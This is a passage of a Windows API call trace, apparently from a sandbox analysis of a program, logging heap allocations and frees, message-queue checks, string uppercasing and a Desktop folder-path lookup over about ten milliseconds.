dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.844] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0090.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0090.844] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0090.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0090.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0090.845] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0090.845] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6488 [0090.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0090.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0090.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75600 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6488 | out: hHeap=0x2af0000) returned 1 [0090.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0090.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0090.847] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.847] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6220 [0090.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0090.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6220 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0090.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0090.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0090.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0090.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0090.849] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0090.850] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0090.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0090.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0090.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0090.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0090.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0090.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0090.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0090.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.853] 